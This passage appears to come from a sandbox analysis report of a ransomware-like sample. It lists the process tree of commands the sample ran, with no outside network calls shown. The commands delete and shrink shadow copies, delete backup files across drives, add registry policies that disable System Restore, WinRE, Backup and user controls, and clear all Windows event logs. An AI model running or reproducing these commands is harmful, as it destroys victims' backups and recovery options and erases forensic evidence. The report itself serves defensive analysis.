    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  PID:4672
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  PID:4632
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  PID:1136
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  PID:3792
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  PID:5112
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  PID:3412
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:3152
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:3508
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:1748
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:4640
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:4488
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
  2⤵
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
  2⤵
  PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
  2⤵
  PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
  2⤵
  PID:4248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
  2⤵
  PID:3448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del %0
  2⤵
  PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
  2⤵
  PID:3212
- - C:\Windows\system32\attrib.exe
    attrib +h +s hrmlog2
    3⤵
    - Views/modifies file attributes
    PID:2980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
  2⤵
  PID:4044
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\hrmlog2
    3⤵
    - Views/modifies file attributes
    PID:3756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:280
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:2100
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:4728
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:4104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:5116
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:2800
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:3176
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:3828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:816
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:4628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:376
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
  2⤵
  PID:1852
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
    3⤵
    PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:1128
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:1652
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:2460
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
  2⤵
  PID:4468
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
    3⤵
    PID:716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:696
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
  2⤵
  PID:4416
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
    3⤵
    PID:3204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:1856
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:4228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:3088
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:2328
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:3280
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:4532
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:2544
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:3932
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:756
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:3236
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:3432
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:1492
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:2128
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:4148
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:1904
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:1552
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:3496
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  2⤵
  PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe el
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3384
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "AMSI/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "AirSpaceChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:4972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    PID:2588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    PID:1156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "FirstUXPerf-Analytic"
    3⤵
    - Clears Windows event logs
    PID:3840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    PID:4204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "General Logging"
    3⤵
    PID:4848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    PID:268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "IHM_DebugChannel"
    3⤵
    PID:2284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
    3⤵
    - Clears Windows event logs
    PID:3832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
    3⤵
    PID:3860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
    3⤵
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
    3⤵
    PID:628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
    3⤵
    PID:4660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
    3⤵
    PID:3552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    PID:2100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    - Clears Windows event logs
    PID:4104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
    3⤵
    PID:4728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    PID:1328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationFrameServer"
    3⤵
    - Clears Windows event logs
    PID:2132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MedaFoundationVideoProc"
    3⤵
    PID:3436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MedaFoundationVideoProcD3D"
    3⤵
    PID:3484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationAsyncWrapper"
    3⤵
    PID:4312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationContentProtection"
    3⤵
    PID:1684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDS"
    3⤵
    - Clears Windows event logs
    PID:4628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    PID:816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationMP4"
    3⤵
    - Clears Windows event logs
    PID:4164
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationMediaEngine"
    3⤵
    PID:376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    PID:2964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformanceCore"
    3⤵
    PID:1852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    PID:4908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    PID:1128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationSrcPrefetch"
    3⤵
    - Clears Windows event logs
    PID:4076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
    3⤵
    - Clears Windows event logs
    PID:3668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Admin"
    3⤵
    PID:4784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Debug"
    3⤵
    - Clears Windows event logs
    PID:4988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Operational"
    3⤵
    - Clears Windows event logs
    PID:4952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
    3⤵
    PID:2516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
    3⤵
    PID:4132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
    3⤵
    PID:1324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
    3⤵
    PID:2384
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
    3⤵
    PID:3048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    PID:5048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:2156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:4124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
    3⤵
    PID:1856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:2084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:2240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
    3⤵
    PID:3776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
    3⤵
    PID:4356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
    3⤵
    PID:3164
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
    3⤵
    PID:3540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
    3⤵
    - Clears Windows event logs
    PID:2332
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
    3⤵
    PID:4724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
    3⤵
    PID:1436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
    3⤵
    PID:5044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
    3⤵
    PID:2676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
    3⤵
    PID:3624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    PID:1520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
    3⤵
    - Clears Windows event logs
    PID:3064
- - C:\Windows\system32\wevtutil.exe
